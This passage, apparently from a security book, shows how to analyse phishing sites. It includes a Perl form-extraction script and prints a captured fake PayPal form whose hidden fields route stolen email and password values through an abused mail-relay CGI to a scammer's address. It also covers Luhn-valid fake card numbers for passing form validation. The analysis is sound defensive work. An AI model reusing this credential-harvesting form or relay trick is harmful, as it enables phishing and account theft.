Filling Out Forms

Whether a site is selling fake Viagra or pretending to be your bank, at some point it is going to ask you for information such as your credit card number. It will solicit that data using a HTML form and will submit to a server-side script in order to record it in some form. The various elements in that form will show you the names of the input parameters for the script.

Example 5-3 shows a Perl script that will extract these from a web page. The script uses the HTML::TokeParser module to handle all the HTML parsing.

Example 5-3. extract_form_elements.pl

#!/usr/bin/perl -w
use HTML::TokeParser;
die "Usage: $0 <html file>\n" unless @ARGV == 1;
my $p = HTML::TokeParser->new($ARGV[0]) || die "Can't open: $!";
while(my $token = $p->get_token) {
  if($token->[0] eq 'S') {
     if($token->[1] eq 'form' or
        $token->[1] eq 'button' or
        $token->[1] eq 'input' or
        $token->[1] eq 'select' or
        $token->[1] eq 'option' or
        $token->[1] eq 'textarea') {
        print $token->[4] . "\n";
     }
} elsif($token->[0] eq 'E') {
     if($token->[1] eq 'form') {
        print $token->[2] . "\n\n";
     }
  }
}

When supplied with the name of a saved HTML file, the script outputs the tags associated with any forms on the page. In this example of a fake PayPal site, the form attempts to capture the victim’s email address and password in the fields login_email and login_password, and submit those to a CGI script called web2mail.cgi.

            % extract_form_elements.pl log1.htm
    <FORM action=http://<domain>/cgi-bin/web2mail.cgi method=post>
    <INPUT type=hidden value=mailexpress2007@lovemail.co.uk
    name=.email_target>
    <INPUT type=hidden value=xxeMailxx name=.mail_subject>
    <INPUT type=hidden
    value=http://66.219.102.57/aw-cgi/ppal/checkin.php
    name=.thanks_url>
    <input type="text" id="" name="login_email" value="">
    <input type="password" id="" name="login_password" value="">
    <input type="submit" name="submit.x" value="Log In">
    </form>

The form also includes three hidden fields. Rather than use its own server-side script, this site is using a script at an unsuspecting legitimate site to convert the contents of a form into an email message that in this case is sent to the address of the operator of the scam, specified in the parameter .email_target. It even tracks the URL of the site that successfully captured the data in the value of the .thanks_url parameter.

Scripts that send email to an address that is specified within the form represent a well-known, and extremely large, security hole, so I have replaced the real hostname with the string <domain>.

To understand how a particular site operates, try entering some test data into forms and then submit them. Clearly you don’t want to enter any real data that might be used to identify you. However you should be aware that the server running the suspect web site will be able to log your IP address, separately from the data you enter in the form. If you are concerned about your anonymity when you explore sites like these, then you should consider the techniques for hiding your identity that I discuss in Chapter 7.

As long as you feel comfortable in that regard, just try entering made-up data in the form and see what happens. In most cases, the scripts will accept any kind of nonsense that you choose to enter, but not always.

Legitimate e-commerce sites will often use JavaScript to validate the information that a user enters into a form before it is submitted. If a phishing site copies a page like this, then it will also validate the input. If you want to enter bogus information into a form in order to see what happens next, then it will need to pass the validation step.

These tests are typically pretty basic, such as checking that you entered something into a required field or checking that your telephone number has 10 digits. The actual data that you enter is irrelevant as long as it passes that test. The one exception to the rule involves credit card numbers. You might think you can simply enter an arbitrary 16-digit number, such as 1234567812345678, but in many cases this will be rejected. In that case, trying other random numbers is also likely to fail. You certainly don’t want to enter a real credit card number.

The issue here is that credit card numbers are not arbitrary integers. In a typical 16-digit card number, the first 6 digits represent the issuing bank or company. Digits 7 through 15 represent the account number and the final digit is the check digit.

This is computed from the other digits using the Luhn Algorithm, after its creator, Peter Luhn. If the number found in position 16 does not match the result of the calculation, then the test will fail. For more information, you might like to consult Michael Gilleland’s web page on the “Anatomy of Credit Card Numbers” (http://www.merriampark.com/anatomycc.htm).

Starting with 15 arbitrary digits, you can calculate the corresponding check digit and thereby create a genuine fake credit card number. A JavaScript page that implements the validation check can be found at http://www.precisonline.com/ccvalidate.demo.html. If you need a fake number, you can use 4444-4444-4444-4448, or if you want something that looks more realistic, then try 4567-8912-3456-7898. Using 4 as the first digit defines this as a Visa card number.

Fortunately for all of us, the credit card industry requires more than a validated number before they hand over any cash. So don’t bother trying to use fake numbers in any real e-commerce site!

In most phishing attempts, when you submit a form, you will be forwarded to the home page of the web site that is being impersonated. Behind the scenes the server-side script that received the form data will write that out to file or into an email message. It will then return a HTML page that redirects you to the legitimate site.

Most of these scripts are surprisingly simple, and there is not a lot of opportunity to probe their inner workings. But it is always worth trying a few variations of parameters because every once in a while you trigger an error message that reveals something about the underlying software.